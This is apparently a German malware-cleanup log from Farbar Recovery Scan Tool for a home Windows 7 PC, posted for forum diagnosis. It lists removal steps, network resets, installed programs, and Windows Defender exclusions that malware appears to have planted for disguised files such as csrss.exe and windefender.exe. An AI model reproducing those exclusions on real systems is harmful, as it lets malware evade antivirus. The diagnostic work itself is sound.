C:\ProgramData\MTA San Andreas All => ":NT2" ADS erfolgreich entfernt
C:\Users\Nico\Anwendungsdaten => ":NT" ADS erfolgreich entfernt
C:\Users\Nico\Anwendungsdaten => ":NT2" ADS erfolgreich entfernt
"C:\Users\Nico\AppData\Roaming" => ":NT" ADS nicht gefunden.
"C:\Users\Nico\AppData\Roaming" => ":NT2" ADS nicht gefunden.
C:\Users\Public\AppData => ":CSM" ADS erfolgreich entfernt
"C:\Windows\system32\Drivers\etc\hosts" => wurde entsperrt
C:\Windows\system32\Drivers\etc\hosts => erfolgreich verschoben
Hosts erfolgreich wiederhergestellt.
VirusTotal: C:\Windows\system32\ntkrnlmp.exe => https://www.virustotal.com/file/5e27f275cd06956184baf125169bf6ab99368a90d203a9b7ee9fe61119b7ea6f/analysis/1526925422/
VirusTotal: C:\Windows\system32\osloader.exe => https://www.virustotal.com/file/ee1810c3bec825b672a40bec7438486c5b344332e2a06b9cd79f7213aa7a578b/analysis/1527842028/
"VirusTotal: C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe" => nicht gefunden
========= dir "%ProgramFiles%" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: CC81-12A3
Verzeichnis von C:\Program Files
31.05.2018 16:22 <DIR> .
31.05.2018 16:22 <DIR> ..
02.01.2018 17:33 <DIR> AMD
02.01.2018 17:15 <DIR> ASUS
31.05.2018 14:13 <DIR> Common Files
03.05.2018 05:14 <DIR> DVD Maker
01.03.2018 13:58 <DIR> Epic Games
02.01.2018 17:15 <DIR> Intel
09.05.2018 03:16 <DIR> Internet Explorer
02.01.2018 20:09 <DIR> Logitech Gaming Software
31.05.2018 16:22 <DIR> Malwarebytes
14.07.2009 09:46 <DIR> Microsoft Games
27.05.2018 11:46 <DIR> Mozilla Firefox
14.07.2009 07:32 <DIR> MSBuild
02.01.2018 17:07 <DIR> Realtek
14.07.2009 07:32 <DIR> Reference Assemblies
08.05.2018 20:21 <DIR> TeamSpeak 3 Client
03.05.2018 05:14 <DIR> Windows Defender
02.01.2018 18:11 <DIR> Windows Mail
03.05.2018 05:14 <DIR> Windows Media Player
02.01.2018 16:16 <DIR> Windows NT
02.01.2018 18:11 <DIR> Windows Photo Viewer
02.01.2018 18:11 <DIR> Windows Portable Devices
02.01.2018 18:11 <DIR> Windows Sidebar
27.05.2018 09:43 <DIR> WinRAR
0 Datei(en), 0 Bytes
25 Verzeichnis(se), 836.029.267.968 Bytes frei
========= Ende von CMD: =========
========= dir "%ProgramFiles(x86)%" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: CC81-12A3
Verzeichnis von C:\Program Files (x86)
27.05.2018 15:37 <DIR> .
27.05.2018 15:37 <DIR> ..
25.04.2018 20:02 <DIR> Adobe
02.01.2018 17:33 <DIR> AMD
02.01.2018 17:05 <DIR> ASUS
31.05.2018 14:13 <DIR> Common Files
01.06.2018 10:01 <DIR> Drakensang Online
01.03.2018 13:56 <DIR> Epic Games
02.01.2018 17:15 <DIR> Intel
27.05.2018 09:11 <DIR> Internet Explorer
07.04.2018 18:40 <DIR> KeePass Password Safe 2
02.01.2018 17:06 <DIR> Microsoft.NET
27.05.2018 11:46 <DIR> Mozilla Maintenance Service
14.07.2009 07:32 <DIR> MSBuild
27.05.2018 09:21 <DIR> MTA San Andreas 1.5
06.01.2018 04:24 <DIR> obs-studio
27.05.2018 11:16 <DIR> OkayFreedom
29.01.2018 16:59 <DIR> OpenOffice 4
02.01.2018 17:06 <DIR> Realtek
14.07.2009 07:32 <DIR> Reference Assemblies
25.05.2018 12:20 <DIR> Rockstar Games
31.05.2018 21:31 <DIR> Steam
03.05.2018 05:14 <DIR> Windows Defender
02.01.2018 18:11 <DIR> Windows Mail
03.05.2018 05:14 <DIR> Windows Media Player
14.07.2009 07:32 <DIR> Windows NT
02.01.2018 18:11 <DIR> Windows Photo Viewer
02.01.2018 18:11 <DIR> Windows Portable Devices
02.01.2018 18:11 <DIR> Windows Sidebar
17.05.2018 08:27 <DIR> YaTQA
0 Datei(en), 0 Bytes
30 Verzeichnis(se), 836.029.149.184 Bytes frei
========= Ende von CMD: =========
========= dir "%ProgramData%" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: CC81-12A3
Verzeichnis von C:\ProgramData
26.04.2018 08:13 <DIR> Adobe
24.05.2018 18:04 <DIR> Epic
27.05.2018 09:47 <DIR> Intel
31.05.2018 14:04 <DIR> Logishrd
31.05.2018 16:22 <DIR> Malwarebytes
25.05.2018 12:24 <DIR> MTA San Andreas All
02.01.2018 21:29 <DIR> Riot Games
0 Datei(en), 0 Bytes
7 Verzeichnis(se), 836.000.247.808 Bytes frei
========= Ende von CMD: =========
========= dir "%Appdata%" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: CC81-12A3
Verzeichnis von C:\Users\Nico\AppData\Roaming
31.05.2018 16:26 <DIR> .
31.05.2018 16:26 <DIR> ..
25.04.2018 20:02 <DIR> Adobe
06.01.2018 04:28 <DIR> AMD
10.01.2018 20:24 <DIR> ATI
11.03.2018 01:39 <DIR> Axolot Games
30.05.2018 09:53 <DIR> DarkSoulsII
13.01.2018 16:31 <DIR> DVDVideoSoft
02.01.2018 16:17 <DIR> Identities
10.04.2018 11:45 <DIR> KeePass
02.01.2018 20:06 <DIR> Logitech
06.01.2018 04:33 <DIR> Macromedia
02.01.2018 17:18 <DIR> Mozilla
02.05.2018 09:39 <DIR> obs-studio
29.01.2018 16:59 <DIR> OpenOffice
31.05.2018 13:37 <DIR> Spotify
01.06.2018 10:33 <DIR> TS3Client
27.05.2018 09:43 <DIR> WinRAR
17.05.2018 08:31 <DIR> YaTQA
0 Datei(en), 0 Bytes
19 Verzeichnis(se), 836.000.182.272 Bytes frei
========= Ende von CMD: =========
========= dir "%LocalAppdata%" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: CC81-12A3
Verzeichnis von C:\Users\Nico\AppData\Local
01.06.2018 10:33 <DIR> .
01.06.2018 10:33 <DIR> ..
27.05.2018 09:35 <DIR> Adobe
02.01.2018 20:11 <DIR> AMD
10.01.2018 20:24 <DIR> ATI
11.03.2018 10:31 <DIR> Axolot Games
02.01.2018 20:19 <DIR> BFH_Test_Launcher
02.01.2018 19:32 <DIR> CEF
02.01.2018 16:27 <DIR> cFos
24.05.2018 18:36 <DIR> ElevatedDiagnostics
01.03.2018 13:56 <DIR> EpicGamesLauncher
27.05.2018 10:40 <DIR> ESET
01.03.2018 14:58 <DIR> FortniteGame
03.05.2018 20:47 64.480 GDIPFONTCACHEV1.DAT
02.01.2018 20:11 <DIR> Logitech
27.05.2018 09:47 <DIR> Microsoft
02.01.2018 17:19 <DIR> Mozilla
02.01.2018 22:31 <DIR> NVIDIA Corporation
20.05.2018 15:01 <DIR> osu!
10.01.2018 10:22 <DIR> Programs
02.01.2018 17:24 <DIR> RadeonInstaller
07.01.2018 15:41 <DIR> RadeonSettings
10.02.2018 10:17 <DIR> Razer
10.02.2018 09:58 <DIR> Razer_Inc
31.05.2018 13:44 <DIR> Spotify
02.01.2018 19:32 <DIR> Steam
01.06.2018 10:33 <DIR> Temp
02.01.2018 22:30 <DIR> TslGame
01.03.2018 14:58 <DIR> UnrealEngine
01.03.2018 13:56 <DIR> UnrealEngineLauncher
02.01.2018 16:16 <DIR> VirtualStore
1 Datei(en), 64.480 Bytes
30 Verzeichnis(se), 836.000.112.640 Bytes frei
========= Ende von CMD: =========
========= dir "%CommonProgramFiles(x86)%" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: CC81-12A3
Verzeichnis von C:\Program Files (x86)\Common Files
31.05.2018 14:13 <DIR> .
31.05.2018 14:13 <DIR> ..
25.04.2018 20:02 <DIR> Adobe
25.05.2018 20:48 <DIR> BattlEye
13.01.2018 16:31 <DIR> DVDVideoSoft
02.01.2018 17:06 <DIR> InstallShield
30.05.2018 09:52 <DIR> microsoft shared
02.01.2018 17:15 <DIR> PostureAgent
14.07.2009 05:20 <DIR> Services
14.07.2009 05:20 <DIR> SpeechEngines
20.05.2018 08:45 <DIR> Steam
03.05.2018 05:15 <DIR> System
0 Datei(en), 0 Bytes
12 Verzeichnis(se), 835.999.920.128 Bytes frei
========= Ende von CMD: =========
========= dir "%CommonProgramW6432%" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: CC81-12A3
Verzeichnis von C:\Program Files\Common Files
31.05.2018 14:13 <DIR> .
31.05.2018 14:13 <DIR> ..
02.01.2018 17:32 <DIR> ATI Technologies
30.05.2018 09:52 <DIR> Microsoft Shared
14.07.2009 05:20 <DIR> Services
14.07.2009 05:20 <DIR> SpeechEngines
03.05.2018 05:15 <DIR> System
0 Datei(en), 0 Bytes
7 Verzeichnis(se), 835.999.928.320 Bytes frei
========= Ende von CMD: =========
========= dir "%UserProfile%" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: CC81-12A3
Verzeichnis von C:\Users\Nico
01.06.2018 10:33 <DIR> .
01.06.2018 10:33 <DIR> ..
06.01.2018 12:05 <DIR> Aufnahmen
17.02.2018 09:51 <DIR> BFH
03.05.2018 08:36 <DIR> Contacts
01.06.2018 10:01 <DIR> Desktop
27.05.2018 09:24 <DIR> Documents
01.06.2018 10:33 <DIR> Downloads
03.05.2018 08:36 <DIR> Favorites
02.01.2018 17:14 <DIR> Intel
03.05.2018 08:36 <DIR> Links
03.05.2018 08:36 <DIR> Music
12.05.2018 22:30 <DIR> Pictures
03.05.2018 08:36 <DIR> Saved Games
03.05.2018 08:36 <DIR> Searches
03.05.2018 08:36 <DIR> Videos
0 Datei(en), 0 Bytes
16 Verzeichnis(se), 835.999.842.304 Bytes frei
========= Ende von CMD: =========
========= dir "C:\" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: CC81-12A3
Verzeichnis von C:\
31.05.2018 16:17 <DIR> AdwCleaner
02.01.2018 17:36 <DIR> AMD
27.05.2018 15:09 <DIR> AppData
01.06.2018 10:33 <DIR> FRST
27.05.2018 14:58 0 History
02.01.2018 17:12 <DIR> Intel
31.05.2018 14:04 1.893.155 myexe.exe
14.07.2009 05:20 <DIR> PerfLogs
31.05.2018 16:22 <DIR> Program Files
27.05.2018 15:37 <DIR> Program Files (x86)
02.01.2018 21:28 <DIR> Riot Games
02.01.2018 16:16 <DIR> Users
01.06.2018 10:33 <DIR> Windows
2 Datei(en), 1.893.155 Bytes
11 Verzeichnis(se), 835.998.208.000 Bytes frei
========= Ende von CMD: =========
================== ExportKey: ===================
[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions]
[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions]
[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths]
"C:\Windows"="0"
"C:\Windows\rss"="0"
"C:\Users\Nico\AppData\Roaming\EpicNet Inc\CloudNet"="0"
"C:\Users\Nico\AppData\Local\Temp\csrss"="0"
"C:\Users\Nico\AppData\Roaming\PatientSunset"="0"
"C:\Windows\windefender.exe"="0"
"C:\Users\Nico\AppData\Local\Temp\wup"="0"
"C:\Windows\System32\drivers"="0"
[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes]
"csrss.exe"="0"
"cloudnet.exe"="0"
"windefender.exe"="0"
=== Ende von ExportKey ===
========= RemoveProxy: =========
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => erfolgreich entfernt
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
========= Ende von RemoveProxy: =========
========= ipconfig /flushdns =========
Windows-IP-Konfiguration
Der DNS-Aufl”sungscache wurde geleert.
========= Ende von CMD: =========
========= netsh winsock reset catalog =========
Der Winsock-Katalog wurde zurckgesetzt.
Sie mssen den Computer neu starten, um den Vorgang abzuschlieáen.
========= Ende von CMD: =========
========= netsh advfirewall reset =========
OK.
========= Ende von CMD: =========
========= netsh advfirewall set allprofiles state ON =========
OK.
========= Ende von CMD: =========
========= Bitsadmin /Reset /Allusers =========
BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
0 out of 0 jobs canceled.
========= Ende von CMD: =========
=========== EmptyTemp: ==========
BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 36661039 B
Java, Flash, Steam htmlcache => 165183668 B
Windows/system/drivers => 69174937 B
Edge => 0 B
Chrome => 0 B
Firefox => 393009119 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 66228 B
Public => 0 B
ProgramData => 0 B
systemprofile => 58583585 B
systemprofile32 => 22979380 B
LocalService => 66228 B
NetworkService => 185242 B
Nico => 310643623 B
RecycleBin => 321072 B
EmptyTemp: => 1015.9 MB temporäre Dateien entfernt.
================================
Das System musste neu gestartet werden.
==== Ende von Fixlog 10:35:56 ====
Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
durchgeführt von Nico (01-06-2018 10:42:14)
Gestartet von C:\Users\Nico\Downloads
Windows 7 Ultimate Service Pack 1 (X64) (2018-01-02 14:16:48)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-1284053026-2775073283-1402561352-500 - Administrator - Disabled)
ASPNET (S-1-5-21-1284053026-2775073283-1402561352-1002 - Limited - Enabled)
Gast (S-1-5-21-1284053026-2775073283-1402561352-501 - Limited - Disabled)
Nico (S-1-5-21-1284053026-2775073283-1402561352-1000 - Administrator - Enabled) => C:\Users\Nico
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 18.011.20040 - Adobe Systems Incorporated)
Adobe Flash Player 29 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 29.0.0.171 - Adobe Systems Incorporated)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 17.12.2 - Advanced Micro Devices, Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.) Hidden
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.) Hidden
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.) Hidden
Drakensang Online (HKLM-x32\...\Drakensang Online) (Version: - )
Epic Games Launcher (HKLM-x32\...\{70843FAC-DA36-49CD-A9A1-6CB1665C9346}) (Version: 1.1.143.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.0.1204 - Intel Corporation)
Intel(R) Network Connections 19.1.51.0 (HKLM\...\PROSetDX) (Version: 19.1.51.0 - Intel)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 3.0.0.16 - Intel Corporation)
Intel® Chipsatz-Gerätesoftware (HKLM-x32\...\{60c073df-e736-4210-9c3a-5fc2b651cef3}) (Version: 10.1.1.7 - Intel(R) Corporation) Hidden
KeePass Password Safe 2.38 (HKLM-x32\...\KeePassPasswordSafe2_is1) (Version: 2.38 - Dominik Reichl)
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
League of Legends (HKLM-x32\...\League of Legends 1.0) (Version: 1.0 - Riot Games, Inc)
Logitech Gaming Software 8.96 (HKLM\...\Logitech Gaming Software) (Version: 8.96.88 - Logitech Inc.)
Malwarebytes Version 3.5.1.2522 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.5.1.2522 - Malwarebytes)
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 4.7.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.7.02558 - Microsoft Corporation)
Microsoft .NET Framework 4.7.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.02558 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008 (HKLM-x32\...\{c239cea1-d49e-4e16-8e87-8c055765f7ec}) (Version: 14.10.25008.0 - Microsoft Corporation)
Mozilla Firefox 60.0.1 (x64 de) (HKLM\...\Mozilla Firefox 60.0.1 (x64 de)) (Version: 60.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 60.0.1 - Mozilla)
MTA:SA v1.5.5 (HKLM-x32\...\MTA:SA 1.5) (Version: v1.5.5 - Multi Theft Auto)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 20.1.3 - OBS Project)
OpenOffice 4.1.5 (HKLM-x32\...\{F0C909D7-D643-4628-8C6A-94073139F0CE}) (Version: 4.15.9789 - Apache Software Foundation)
osu! (HKLM-x32\...\{5fae645a-e4b4-4541-a037-7e4aa9f3e40a}) (Version: latest - ppy Pty Ltd)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7233 - Realtek Semiconductor Corp.)
RevServicesX (HKLM\...\{DDA8E261-B96C-4D2B-887F-D8AF1D7EF361}) (Version: 4.0.4 - SystemaRev) Hidden
Spotify (HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Spotify) (Version: 1.0.80.474.gef6b503e - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.1.7 - TeamSpeak Systems GmbH)
Vulkan Run Time Libraries 1.0.65.0 (HKLM\...\VulkanRT1.0.65.0) (Version: 1.0.65.0 - LunarG, Inc.) Hidden
WinRAR 5.50 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.50.0 - win.rar GmbH)
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (Alexander Roshal)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-05-09] (Malwarebytes)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2017-12-17] (Advanced Micro Devices, Inc.)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-05-09] (Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (Alexander Roshal)
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {48AFC486-010B-4B4D-87F2-9F7C7EDA12AF} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated)
Task: {57F4CA92-38A7-4B47-8B28-13BE860412BD} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-05-09] (Adobe Systems Incorporated)
Task: {657B38A1-8903-4F90-8E4D-E9C7AEFDC6FC} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\dvrcmd.exe [2017-12-17] (Advanced Micro Devices, Inc.)
Task: {B51F287F-670C-42C3-A480-43546148601C} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-12-17] (Advanced Micro Devices, Inc.)
Task: {CBF07082-94D0-43DD-961D-5221CC36D495} - System32\Tasks\Microsoft\Windows\Windows Activation Technologies\ValidationTask => C:\Windows\system32\Wat\WatAdminSvc.exe [2018-02-01] ()
Task: {D74FFB45-80D0-40D0-B76B-3411A9AA73A2} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_29_0_0_171_Plugin.exe [2018-05-09] (Adobe Systems Incorporated)
Task: {E3E11419-953A-4F4A-89E6-E6FE35B1A897} - System32\Tasks\ASUS\i-Setup161131 => C:\Windows\MEI\AsusSetup.exe [2013-08-22] (ASUSTeK Computer Inc.)
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
==================== Verknüpfungen & WMI ========================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2018-01-02 17:05 - 2014-01-28 05:16 - 000936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.02.00\atkexComSvc.exe
2018-05-31 16:22 - 2018-04-30 12:54 - 002493648 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2018-05-31 16:22 - 2018-04-25 13:16 - 002297040 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll
2015-03-07 02:07 - 2015-03-07 02:07 - 000908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
2017-10-20 05:29 - 2017-10-20 05:29 - 001096824 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
2015-03-07 02:07 - 2015-03-07 02:07 - 000060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
2017-10-20 05:29 - 2017-10-20 05:29 - 000241784 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
2017-10-20 05:02 - 2017-10-20 05:02 - 000077824 _____ () C:\Program Files\Logitech Gaming Software\LAClient\zlib.dll
2017-10-20 05:02 - 2017-10-20 05:02 - 000144896 _____ () C:\Program Files\Logitech Gaming Software\LAClient\libssh2.dll
2018-01-02 17:05 - 2018-06-01 10:37 - 000033280 _____ () C:\Program Files (x86)\ASUS\AXSP\1.02.00\PEbiosinterface32.dll
2018-01-02 17:05 - 2014-01-28 05:16 - 000104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.02.00\ATKEX.dll
2017-12-17 22:06 - 2017-12-17 22:06 - 000357256 _____ () C:\Windows\SysWOW64\GameManager32.dll
2018-01-02 19:30 - 2018-05-01 09:32 - 000788256 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2018-01-02 19:30 - 2016-09-01 03:02 - 004969248 _____ () C:\Program Files (x86)\Steam\v8.dll
2018-01-02 19:30 - 2016-09-01 03:02 - 001563936 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2018-01-02 19:30 - 2016-09-01 03:02 - 001195296 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2018-01-02 19:30 - 2018-05-19 01:01 - 002632480 _____ () C:\Program Files (x86)\Steam\video.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 005137696 _____ () C:\Program Files (x86)\Steam\libavcodec-57.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 000847136 _____ () C:\Program Files (x86)\Steam\libavutil-55.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 000695584 _____ () C:\Program Files (x86)\Steam\libavformat-57.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 000351520 _____ () C:\Program Files (x86)\Steam\libavresample-3.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 000783648 _____ () C:\Program Files (x86)\Steam\libswscale-4.dll
2018-01-02 19:30 - 2018-05-19 01:01 - 000979232 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2018-01-02 19:30 - 2016-07-05 00:17 - 000266560 _____ () C:\Program Files (x86)\Steam\openvr_api.dll
2018-01-02 19:31 - 2018-05-01 09:32 - 000788256 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\SDL2.dll
2018-01-02 19:31 - 2018-05-14 21:39 - 083524384 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\libcef.dll
2018-01-02 19:30 - 2015-09-25 01:52 - 000119208 _____ () C:\Program Files (x86)\Steam\winh264.dll
2018-01-02 19:31 - 2018-05-14 21:39 - 002253600 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\swiftshader\libglesv2.dll
2018-01-02 19:31 - 2018-05-14 21:39 - 000109856 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\swiftshader\libegl.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
==================== Hosts Inhalt: ===============================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2009-07-14 04:34 - 2018-06-01 10:33 - 000000035 _____ C:\Windows\system32\Drivers\etc\hosts
